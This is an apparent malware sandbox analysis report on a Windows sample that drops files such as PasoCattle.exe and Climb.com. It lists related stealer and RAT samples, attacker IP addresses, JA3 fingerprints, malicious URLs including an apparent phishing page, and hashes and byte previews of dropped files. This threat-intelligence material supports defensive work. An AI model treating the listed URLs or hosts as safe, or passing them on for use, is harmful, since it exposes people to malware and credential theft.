CLOUDFLARENETUS	Wvo9FU4qo9.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	JA7cOAGHym.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	T4qO1i2Jav.exe	Get hash	malicious	LummaC Stealer	Browse	172.64.41.3
	EB2UOXRNsE.exe	Get hash	malicious	Unknown	Browse	104.21.112.1
	FXdg37pY22.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.66.86
	gshv2.exe	Get hash	malicious	Unknown	Browse	162.159.129.233
	OiMp3TH.exe	Get hash	malicious	LummaC	Browse	172.67.216.236
	https://dnsextension.pro/invoice/d2d0bf8701b34bc296ca83b956c10720	Get hash	malicious	Unknown	Browse	104.21.31.138
	k0ukcEH.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	appFile.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.94.92
REDSERVICIOES	YrxiR3yCLm.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	Cph7VEeu1r.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	3stIhG821a.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	DRWgoZo325.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, Vidar	Browse	185.121.15.192
	8wiUGtm9UM.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	vJPhYDClT5.exe	Get hash	malicious	Unknown	Browse	185.121.15.192
	jklg6EIhyR.exe	Get hash	malicious	Unknown	Browse	185.121.15.192
	qr2JeuLuOQ.exe	Get hash	malicious	Unknown	Browse	185.121.15.192
	E6rBvcWFWu.exe	Get hash	malicious	Unknown	Browse	185.121.15.192
	gDPzgKHFws.exe	Get hash	malicious	Cryptbot	Browse	185.121.15.192
AMAZON-AESUS	BkB1ur7aFW.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	5uVReRlvME.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, Stealc	Browse	34.226.108.155
	db0fa4b8db0333367e9bda3ab68b8042.i686.elf	Get hash	malicious	Mirai, Gafgyt	Browse	34.195.210.183
	OoYYtngD7d.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	NWJ4JvzFcs.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	EwhnoHx0n5.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	PqHnYMj5eF.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	YrxiR3yCLm.exe	Get hash	malicious	LummaC	Browse	3.218.7.103
	qZA8AyGxiA.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	Cph7VEeu1r.exe	Get hash	malicious	LummaC	Browse	3.218.7.103

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	Wvo9FU4qo9.exe	Get hash	malicious	LummaC	Browse	104.21.2.51
	T4qO1i2Jav.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.2.51
	FXdg37pY22.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.2.51
	FXdg37pY22.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.2.51
	OiMp3TH.exe	Get hash	malicious	LummaC	Browse	104.21.2.51
	k0ukcEH.exe	Get hash	malicious	LummaC	Browse	104.21.2.51
	https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102	Get hash	malicious	Unknown	Browse	104.21.2.51
	appFile.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.2.51
	FloydMounts.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.2.51
	RDb082EApV.exe	Get hash	malicious	LummaC	Browse	104.21.2.51

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\768400\Climb.com	JA7cOAGHym.exe	Get hash	malicious	Vidar	Browse
	appFile.exe	Get hash	malicious	LummaC Stealer	Browse
	FloydMounts.exe	Get hash	malicious	LummaC Stealer	Browse
	installer.bat	Get hash	malicious	Vidar	Browse
	skript.bat	Get hash	malicious	Vidar	Browse
	din.exe	Get hash	malicious	Vidar	Browse
	yoda.exe	Get hash	malicious	Vidar	Browse
	lem.exe	Get hash	malicious	Vidar	Browse
	script.ps1	Get hash	malicious	Vidar	Browse
	installer_1.05_36.4.zip	Get hash	malicious	NetSupport RAT, LummaC, LummaC Stealer	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ZTM2pfyhu3.exe.log

Download File

Process:	C:\Users\user\Desktop\ZTM2pfyhu3.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Temp\768400\Climb.com

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	947288
Entropy (8bit):	6.630612696399572
Encrypted:	false
SSDEEP:	24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
MD5:	62D09F076E6E0240548C2F837536A46A
SHA1:	26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
SHA-256:	1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
SHA-512:	32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: JA7cOAGHym.exe, Detection: malicious, Browse Filename: appFile.exe, Detection: malicious, Browse Filename: FloydMounts.exe, Detection: malicious, Browse Filename: installer.bat, Detection: malicious, Browse Filename: skript.bat, Detection: malicious, Browse Filename: din.exe, Detection: malicious, Browse Filename: yoda.exe, Detection: malicious, Browse Filename: lem.exe, Detection: malicious, Browse Filename: script.ps1, Detection: malicious, Browse Filename: installer_1.05_36.4.zip, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\768400\V

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	459790
Entropy (8bit):	7.999632331590964
Encrypted:	true
SSDEEP:	12288:P02pW2c56oA+/4hza+MglCQS9z/jgM/UB:w2LNMW6/gM/UB
MD5:	F9D71E9E58748BEEA3554073DCD205C8
SHA1:	0F059E563F46355BCA0866B3D7D0993DA4991C18
SHA-256:	45206C86B0AE3EB38240DD076201BE60B4983BBD0209CAA20516A9E6595C8BBA
SHA-512:	BBC015D43F281AF0D1CC75C3E41E13E09E5D24E9F23DB9FF5B6012E5D8978FD9C6C5C4A08B6262909660C606014BB375DCE1C4C909CA4B2D2CCA39722EBAF1A0
Malicious:	false
Preview:	.O.L..Q.HP.....g'V.,3?...p7;6}...9...<.B..C.f.JK.HF. .....7.C...p.o....:@....[v%.k.6.e..D.Y.(.p....t.[... ../l...$.6......U.6..Ye.Jw}h...i......l....P..s. .;..Z..O..\|....4...{.U.-..s.:Hbs!E.C...Md.x.b %....N.r.-1....3.z.^v..m.a.5.j........jy.dq..D...z...).74..b..Y..x....p.c@.z{....&.D..j.{..........`...^.G........Rpgf..+3........%.i.......A....wde......I1.3........Lq.fe...Jdr.+./.,7......v....}.Fr.P.......5cEZ.p.@.....#B.....L...Td......c.....X...........92 N..zn.N.....g.....CMG...:.X......i...MW....T>}%C....>..@.S.+.&.R.......a....D.~......."...... ...z....[.!....r..C.D..1[.}S..zC....C..gv..3../q...S........(..9M./[.X..t.w.Y..l.T'...$..L.>n........I:\.".i..D(..w....}7;.....2.n!X..l.........#.........D.QA...0p.e$/..7 .{/..H{3..i.U@....ye.....]..o....b.]+......i.$..$..^siT:..{....s...).p..G.C.8..J:.?...@"D.JY=.+["kSq..M..."?.`..r]......\|QT~dB..c..O..$.C...l...z..1.......m.W......k..`......HY2...Z..]....... ....>f...

C:\Users\user\AppData\Local\Temp\Alt

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	104448
Entropy (8bit):	5.172930596796904
Encrypted:	false
SSDEEP:	768:sc/mex/SGKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVx:/PdKaj6iTcPAsAhxW
MD5:	BE1780E619FC600C90159E321A7BCBB9
SHA1:	C710D9B6E5843AD64355C032D4835707B245170E
SHA-256:	DBA6C4B6BEB02F24A6B4F3C7892605A06A8D99D5F65366C021B1337F1D192852
SHA-512:	F0BB5EB234DD25FBB7D7107839CBC9E72CBD1E269CA5F4445E245CBAC4CD8E6DD8966BB4DB08C0B0C88AB22E4A78E46CC3323E201E31E15E0E6E9D82C416D0ED
Malicious:	false
Preview:	................................................................................................................................................................................................b........\... ... \|....................................................................L...........I.....................................................................................0.1.2.3.4.5.6.7.8.9.A.B.C.D.E.F................?......Y@.....@.@......P?...........................(#...pqrstuvwxyz{$--%"!' .&,[\.....`abcdefghijkmno]......_..................................................................................................................................................1L..2L..2L..2L.$2L.42L.@2L.H2L.T2L.\2L.l2L.t2L.\|2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..3L..3L. 3L.,3L.43L.<3L.T3L.`3L.l3L..3L...J..3L..3L..3L..3L..3L..3L..3L..4L..4L.$4L.44L.D4L.T4L.l4L..4L..4L..4L..4L..4L..4L..4L..4L..4L..5L...J..5L.45L.P5L.p5L..5L..5L..5L..5L..6L.$6L.<6L.P6L.h6L..6L..6L..6L..6L

C:\Users\user\AppData\Local\Temp\Articles

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	268
Entropy (8bit):	4.968398681802287
Encrypted:	false
SSDEEP:	6:1qjvVg3F+X32+hZCt7HSbYwClS6CSNEcixNU:1yGSG+fCtJfjEvq
MD5:	41B7CDB6E286EE0E44962C8987B91D3C
SHA1:	E57E0B12ABC823CB91D3ACFA32AD63230405057D
SHA-256:	43F8E40249EC2FC185FDC323451FB72384EC9FF5910BD927C89CE8C41CACB58B
SHA-512:	B4423FD2C9D40D3715F93C6E130AF4B81CAA0B3BB3D23AF542D7043E6B91CAB1CCDDDBD2ECE8656736E4A3C594BAD99436432F4BD2EA2EA133FF381DCB8248CA
Malicious:	false
Preview:	cocks........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..

C:\Users\user\AppData\Local\Temp\Attractions

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	141312
Entropy (8bit):	6.686197497967684
Encrypted:	false
SSDEEP:	3072:fEMnVIPPBxT/sZydTmRxlHS3NxrHSBRtNPnj0nEoXnmowS2uI:sMVIPPL/sZ7HS3zcNPj0nEo3tb2j
MD5:	2ED9FFBA1FEA63AD6D178AEA296ED891
SHA1:	E0D1BB0AF918F8DDEE3FB3D593CAF0FC52C77709
SHA-256:	21B6E909F647CC2B1ADB6945ACEDA0EE2CB3DF2C91641D7609FFAB2DB6A40FA1
SHA-512:	52524AD966A8D72BB53ECBA0AC5EE5DC0DB6BE0569CC0E7E0C2D03B5266465C5162AD1048AD1B827E3BDCF985D0932E19336C2D5179BCD7E655E87BABB421055
Malicious:	false
Preview:	.U...........tB.E..M.}.G.}..H.E.;}.\|..%.......t.;.....v..Fh.............RY...}..}.........E...@..P.u.V.u..u............V.......;E...&....}..t.f.......f#......f;.u.....E...@..P.u.V.u..u..G........t............}......F\|.M.+..........C.........M.f9C...........]..e.....C.......%..........E.............U.......8....E...%....=....u".M................%.....M..........E.;.U...C.]........U..........L.............M.,K......K...;.............K......f;.w..F<.....E.............f;.w..F<.....E.;..............E..]..j.....C......E.U.......E.......C.3.U.E..(t..U...5u..E...........~3..E.........U...d......E.........U...N3..E.........U..E........;................+.....U.....+K.....+K..U.E..u..E......}......E..E...y...%.....E......]..E......E.....=....u<..C..].%...........E...........E............E.......]..E....E.}...]..Y.]..........r;.}.........L..............M.,K......K...;.t..U.......U....3..}..E...............E....M.F\|.}.+.;.w.Q.u.W.6n.......u..M.....E..?.E......<.....

C:\Users\user\AppData\Local\Temp\Beaches

Download File

Process:	C:\Users\user\AppData\Local\Temp\PasoCattle.exe
File Type:	data
Category:	dropped
Size (bytes):	62464
Entropy (8bit):	7.997732291588885
Encrypted:	true
SSDEEP:	1536:OC2t1VFGBsTxn/fkC+a+kem/B7BKtrFhBzd6g/4k:OC2j+u/CXoJ7ctrfxn/h
MD5:	50CB864F887F934B80CC62A6BB08D611
SHA1:	C23F38262D04019CF198D4499DD95945FE078EC4
SHA-256:	B2F79588B9EC05A7520F42382EA47F596AEB82A83AA4BF3426DB5AA64ABF877A
SHA-512:	9F68238A297F61C48380CE6867AFB929A231AB88CA836E00400B182F3CF5EED99E69B38A60CBFA578FFBF50D5C3326A6E8ECEFDF719FA8FBB99F1FC4C799E283
Malicious:	false
Preview:	.3.\|...zit..ct.]!....).1o......>4...?c._...3...bd..t.[(FiSi._...2.%...".....!P...c.Y ..k...\O.k..i..}...r&..r.........Y.hTy4...n."....4..=T......A.{...b<_.4./..+g.(.g.WK..)s..........js..y.i.Y.q8.\..<.6.........S......!..hP..<.f.\|\|.Y..d:8...i.i.T.'5..g.U..B..%..O....fg.v.8.Cp.W....(..3...J?. P$O...:u.Q....K.m.....N.b.A.e.M.7...{. C6U..(<_6y.QV....?..4...^.~.....A4.....U<..^....Y..n}.Y..h.).....Y#u...Y>.u.O.v....:..#..0......$KN.j.gK.(.x4......50.X....*m......\Od.K.}CN....n/."w(.Ru.6...6..\y}.{..w./..U...,&......`<..<....X:@$Ea.....4.....P..>........F..t<.M1C....`..F7EE.....A.m.W.......19.".?H...Q.....0.!K.).W..U.J=h}J... .n..L&5D....'F- s.e...v...@...'.Iwv.IcHPH..w..?..9.5#..C..I0.a.,.D.b.\|....~........\|9..........3....l_........B`G.UH..I.E......z&..t.M........E.,.&.[..Y..l.G...Ll..W>.3.i..B...S..8V.:\W.............$.c+@-..N/hd.YH.M..8L...WC..IX...?...?!k.F.b.....CLN..C.\..........J....i.....o...o..e.Y.....K..UL.]....K.v...y..e..:..X#.m.

C:\Users\user\AppData\Local\Temp\Cooked

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	59392
Entropy (8bit):	6.612657669946948
Encrypted:	false
SSDEEP:	1536:FC5HRu+OoQjz7nts/M26N7oKzYkBvRmLORuCYm9PrpmES6:AhVOoQ7t8T6pUkBJR8CThpmES6
MD5:	A5CA22529355B052CBCCB045EC8172A1
SHA1:	12F5D5871B07A1EABB9B57753432FC59680830D2
SHA-256:	E434C2A8351E6517F35FFA6D38542390AD0A905BC23FAC64E7D61680AE7CEB67
SHA-512:	AF9D158F1590FB96C1FB7DD1635FE9D1D7528FC3349068363F169907411EE488E2BF6AC03CE851189DBF24FDED3504A574FFF51B5CE6D41E06D8AB9360FC099E
Malicious:	false
Preview:	.E........E.Pj.V.u..E.........I...tV.E.....uM.U..$.........@..@.......t.........$........................t........3.@...3..3..Y3._^[....U...4.M..V.u...u..M...)M...3.@....W...t....tz...t....t..E...)M.PV.i.....t].}........t+M...tK.x..tEj,.E..E.0...j.P.X......E......E.P...t+M.j.V.0....I...t..M..E...3.@..3._^....U..U..E......y..........t...=....}.........t.....2.]...U......L.M.SVW.[s..P.L$$.s...L$..3.u..\|$ .....................t&...t!.D$...)M.PV.p............]..t$..T.......t....u/f9..<M.u.h.)M........f9..,M.u.h.)M...W.W...3.9..t+M...z...f9...q......t+M.h.....D$...2..YP.L$...r..3..D$(0...j,P.D$4P.AW...D$$....D$L.D$(.D$,.....D$P....P3.P.D$.V.0....I..........D$0...........D$4%.....D$...y&3.f9.......W...D$0.....\|$P..\|..Y.D$P.L.D$4..@t......y.......t........t..........t.......D$4.t...u.....D$,.....D$4.D$(P3.P.D$.V.0....I...t3..~*......t.3.PV...\|$..t.3.Pj..D$..0....I...t.3.C..3...D$..(.u.j.P.0...t$ ..0.......3..L$$.).u.j.Q.0..W..0....._^..[..]...U..Q.M...E.P.u...)M..Z.....t,.E

C:\Users\user\AppData\Local\Temp\Enrolled

Download File

Process:	C:\Users\user\AppData\Local\Temp\PasoCattle.exe
File Type:	data
Category:	dropped
Size (bytes):	83982
Entropy (8bit):	7.99794941439563
Encrypted:	true
SSDEEP:	1536:SL5dqhmZ4lVzAf9EFl407V6Lf4wXM3wmosIAUZ8DYZyxSr1Pum:WqU2zOmFl40RwfdM3Ros/URcxgmm
MD5:	B0830E2CE03D5BC821D5136F5D8B4D5E
SHA1:	99840A43C60501C4F1F0151EE11798C7FA395591
SHA-256:	D5916524E70C85211005E2E7851E8250BF46ADD8C28FD501DB4BCFBE9EE1ADEE
SHA-512:	58F230B27771DA357658231E2E7445E7D13239CDB0D10D4CD5FA81267DF6EA4883C23139CE41F4892E64B6EE3CD67176C52375E9710823133B7CE20D0EB62934
Malicious:	false
Preview:	...U.,..l..I.E.l./@..8......%...i.\w6TJ....Vr...s.Y7"u......T......Z.f..Cv.X...th.....N..Ao.."C..K...(....1;WL...7..59...z..C-+..OD.N.7@.}.]......z;......^.w.2ee(.4.....FS....;B...0.#......f.r8...Y...ao.)../..0......;..ANl...f..m.=[].K.FQ4n...,........5?......E,..o../.}B..<.........te.._..s..}......._-...&.nOj..........[..p.[....CD..',...r.})e..!...K.?.x.SK.fs.{.u..E3V..8.."...^L.)J....:.................[1.........\|.p......Ou.n....+...P...}.&C..!..,.V.P...#..v.P..P..6.....F....I..8...Q...gP)V@..U.......S.wG..k'5>..i`...KH...\ ..y....................ql...x.....&....o..=...V.H.=W.....LO..#...._H..t.....0..;.&Ie...?.z...@....s......2$r.Am..).A..J...U.5,.(M..._...]h..0...{....1..G....R...L.u....M.....:.q..%.!O....q.\|.:....xy....w"N.c..y.t....Y.).-...T#...2=.nB.dM.M...+.p.....M....1_..M...k..Wp.e......M.J.5w].........R.P......(....Z.}b.K...\|...vZ.V.p..........D9........t...k.....ge.m.rVj..;..m;D..P.rR..`'5..9.LXY........d.RJ+..)

C:\Users\user\AppData\Local\Temp\Fingers

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	119633
Entropy (8bit):	6.0874087589267925
Encrypted:	false
SSDEEP:	1536:sgarB/5el3EYrDWyu0uZo2+9BGmdATGODv7xvTphAiPChgZ2kOE6:sgarB/5elDWy4ZNoGmROL7F1G7ho2kOb
MD5:	7D6337C50FA5EB0681D5B094E58E3541
SHA1:	BD1A7A54D4F4382AACA1FFAF4A690799CA6081F7
SHA-256:	791C72AEB0CAF7FC14F0420F053C0698D27D68265810762470307EA489568780
SHA-512:	A24F3EADC814C87F2D592F64467CC0894347ADE35924507E81719104C0B9F293A76A51D92B5329CB57574B6EE65C71ED1BBE30D61BE041E1AE522ADDE617912F
Malicious:	false
Preview:	.KillTimer.7.PostQuitMessage...SetFocus....MoveWindow....DefWindowProcW....MessageBoxW...GetUserObjectSecurity.-.OpenWindowStationW..h.GetProcessWindowStation...SetProcessWindowStation.(.OpenDesktopW..N.CloseWindowStation..J.CloseDesktop....SetUserObjectSecurity...GetWindowRect.6.PostMessageW....MapVirtualKeyW..&.GetDlgCtrlID..d.GetParent...GetClassNameW.;.CharUpperBuffW....EnumChildWindows..{.SendMessageTimeoutW.m.ScreenToClient....GetWindowTextW..,.GetFocus....AttachThreadInput...GetWindowThreadProcessId..!.GetDC.e.ReleaseDC...GetWindowLongW....InvalidateRect....EnableWindow....IsWindowVisible...IsWindowEnabled...IsWindow..#.GetDesktopWindow....EnumWindows...DestroyWindow.K.GetMenu...GetClientRect...BeginPaint....EndPaint..U.CopyRect....SetWindowTextW..'.GetDlgItem..s.SendDlgItemMessageW...EndDialog...MessageBeep...DialogBoxParamW...LoadStringW.!.VkKeyScanW..=.GetKeyState.B.GetKeyboardState....SetKeyboardState....GetAsyncKeyState..v.SendInput.0.keybd_event...SystemParametersInfoW...F

C:\Users\user\AppData\Local\Temp\Maternity

Download File

Process:	C:\Users\user\AppData\Local\Temp\PasoCattle.exe
File Type:	data
Category:	dropped
Size (bytes):	59392
Entropy (8bit):	7.997035686695416
Encrypted:	true
SSDEEP:	1536:F5ORWtjA85b/PQW6wzxYtMbs8VKKXsgN1yFi3eb7:Op85T6tIDVKKXZMoeb7
MD5:	BF1A63801FCE643D91670984E50AA26C
SHA1:	96CC6E514ED73B0F0816884E6019F3F3C31F6A80
SHA-256:	96E885D5F09D9B01BBBB20C5DA4005E84683F65EE061EB2D22F41DA96A1A48A0
SHA-512:	D741447E64E376442A4FBEE480A94C494219292BB70DF6A346C5244C12F647BDC074F13F53A0FC32202C1D8D6A37C7BAA9CC0E750020492B99781D9CEEE3F943
Malicious:	false
Preview:	.O.L..Q.HP.....g'V.,3?...p7;6}...9...<.B..C.f.JK.HF. .....7.C...p.o....:@....[v%.k.6.e..D.Y.(.p....t.[... ../l...$.6......U.6..Ye.Jw}h...i......l....P..s. .;..Z..O..\|....4...{.U.-..s.:Hbs!E.C...Md.x.b %....N.r.-1....3.z.^v..m.a.5.j........jy.dq..D...z...).74..b..Y..x....p.c@.z{....&.D..j.{..........`...^.G........Rpgf..+3........%.i.......A....wde......I1.3........Lq.fe...Jdr.+./.,7......v....}.Fr.P.......5cEZ.p.@.....#B.....L...Td......c.....X...........92 N..zn.N.....g.....CMG...:.X......i...MW....T>}%C....>..@.S.+.&.R.......a....D.~......."...... ...z....[.!....r..C.D..1[.}S..zC....C..gv..3../q...S........(..9M./[.X..t.w.Y..l.T'...$..L.>n........I:\.".i..D(..w....}7;.....2.n!X..l.........#.........D.QA...0p.e$/..7 .{/..H{3..i.U@....ye.....]..o....b.]+......i.$..$..^siT:..{....s...).p..G.C.8..J:.?...@"D.JY=.+["kSq..M..."?.`..r]......\|QT~dB..c..O..$.C...l...z..1.......m.W......k..`......HY2...Z..]....... ....>f...

C:\Users\user\AppData\Local\Temp\PasoCattle.exe

Download File

Process:	C:\Users\user\Desktop\ZTM2pfyhu3.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1062983
Entropy (8bit):	7.969270980145046
Encrypted:	false
SSDEEP:	12288:00giFMExCeGp6bA+2lC/S9zD0upW2+IHxb7A8G5jMVTn1Xx1MwT6/OkwyR4UzU+J:/ieH66juI80CT1DMa4LwxIM9HM/U1OK
MD5:	A3E9A86D6EDE94C3C71D1F7EEA537766
SHA1:	DDFBF23CBA3ADC0BCAD33162D1BDBEE8CCD12294
SHA-256:	A7B3B6CA09E92530EF0BD156B0C2C0213E957129BFB83B8A99D2387932BB2CA5
SHA-512:	AF6391847FF626FF88FF0583ADDE9536EFF25026ACBC0D0165CE27286A8F145CBB0B5059A294D7A14CB497C60B96E9A5DE88D41A3EE6A339FDB554DE51790F0C
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8............@.................................t.....@.................................@..........."u..............8+...`.......................................................................................text....r.......t.................. ..`.rdata..n+.......,...x..............@..@.data....+..........................@....ndata...................................rsrc..."u.......v..................@..@.reloc............... ..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Pot

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	133120
Entropy (8bit):	6.593902201612224
Encrypted:	false
SSDEEP:	3072:2+AqVnBypIbv18mLthfhnueoMmOqDoioO5bLezW9FfTut/Dde6u640ewy4Za9cob:2mVnjphfhnvO5bLezWWt/Dd314V14Zgz
MD5:	998B4B6FEEE76BEB9CA721DCD2B8A4E0
SHA1:	6556CA455B7F7B3B36F5A703746B17D2D662F82B
SHA-256:	A3718216E2D86886D768FDE1FE869B9F84FA96309ADC8D83CAF1F17B939F76BF
SHA-512:	A8E92A0CF4CA465313BFE27D860F956F3777B3202A8B1FDFB03DB4AAAD567F3546C525F40D85414D04806D964B650637846FD1F7CCA6736B8C8E327B342C3617
Malicious:	false
Preview:	.~..v..F..H..u....N.P...j...P......u......k1...>3._.F.....^]...U..E.VW.@..H..0.2...P...*...P.\....u......+1...>3._.F.....^]...U..V.u....W.~..v..F..H.......V.P.J..2.....P.......P.....u.......0...>3._.F.....^]...U....SVW.}.3.]..]..]..w....r!.G.j).H..M.......u......M.A......r..G.j).H.......u..W....E....r..O.j).I..k.....u..9....O.....E..I..(.....$..E..G..p....G....u..F..u..u....G.SQ.......P.x....u......./...>3._.F.....^[....U..M.3.9A.v..A....q..VWP......u....../...>3._.F.....^]...U.....e..SVW.}.........j...j.S.X....E.....x..v..@....Mq.....E..M.Q.M.Q.M.Q.M.Q.M.QP.............E.3..e..Fj..E.E.VPS.u..........M..#/...E.3.V.E.E.VPS.}.u..........M.......E.j..E.E.VPS.}.u.........M.......E.j..E.E.VPS.}.u.........M......E.j..E.E.VPS.}.u..].......M......8.......'.3.B.W....H..\|1...D1.t..@8.P..\|1...D1.t..@8.@.._^3.[....U........=.(M..SVW.L$.uA...@..\|....T..t..R83.C.Z..\|....T..t..R8.u....B.......3..^..>.Q.....(M..0....M.3..C.\|$..y..v..I.......;.u.....2.....!............M..

C:\Users\user\AppData\Local\Temp\Promise

Download File

Process:	C:\Users\user\AppData\Local\Temp\PasoCattle.exe
File Type:	data
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	7.9975626227798315
Encrypted:	true
SSDEEP:	1536:cQ36ddIs69BLJSqA8PWfAx/lruBD5hf6akJGg1lg+xM4Zl:cQlF9oAjrO4G+a+xMyl
MD5:	832042466014761981CDAF193F0E7041
SHA1:	301225CDE7E7DE3A10E98D7C9DE191D85AAC0099
SHA-256:	FF5E35AC52EA87EC94D3847112D9F3083B3BF252FA74C76D453EE118BA1A2BE8
SHA-512:	2A49ECD5DE8702A71267463B8CD130F1AA91D1E3F8D9EB866B8C58C8FC46374F98AECDCDCD071D207F734A61D082AAA56170152EEDA3C0E445C0A5CCD6A50260
Malicious:	false
Preview:	..2O;.....=F.u...~X.^tu4ey?...v............E=.....U..x...'...=.g.....=..".......C-..}...8...8.Br..g]....M.-.>.r,...I.......!.5..f.4...FV.U.,.%zY...~.ysqV..V...I...?...)..zRsa...#.G..C.pqe.b{.:%k.y...)..Y..-<.n.J/<gkN..m.\.L.I.VIC q.rc..YMn%<....O.......4.....J..C,s..U.{N.z.pAU..dX...M.7.$1...a..&..\|89...}).g...F.e.p.....&..P..t.0......64.$)...K..f2.!.P.P...A...~..G..!.M.f.f..._...i..U.<..@9 .....2.FN.`....fT..#[...\9.0.kO.S.^A.....K:.....a.AES2...ps$.8F5... UF......(.X=Ha............s.rb.._f.A...q....#.....M..T...qj:...$0Y...P...r..o..].m.f.>.1_\|.p76.........a..6.>G.a.....c...]u+.$....v. 3[-e...D.kw. ..Y.O.a.BsW....E...bw`..Y.7>...<......e.....a..E...Vy..#u3..A.YW......~......w.-P..)S..4.J...k..JZ.\.HR..V...y....q..jB..@.G@-..Q5."[.&A.J!....F.'J4..>.......< ........@..c5/K.y.....S......?.3.Q...2M........?~....GQ0.k8.{5[.P\WY..7....k.wc.JA.k..77"^a.n...I.#....J.M..p!....t=z..?W .Iqi...b..!PDv...)3.....;,#.uH2...X....+..<.G;hM......$.Npr.e....\|.

C:\Users\user\AppData\Local\Temp\Rat

Download File

Process:	C:\Users\user\AppData\Local\Temp\PasoCattle.exe
File Type:	data
Category:	dropped
Size (bytes):	100352
Entropy (8bit):	7.9982884825197775
Encrypted:	true
SSDEEP:	1536:qIl7/T+lGxZhNlCtHtyAtgvWscqQlxaDOgASCZ5FSJqz7D6qAK8KxGBpM:xZL33R0HtyA+RQlKOmxw/D8KxGBpM
MD5:	CD00C53F92FBED3C8947B7205A4247ED
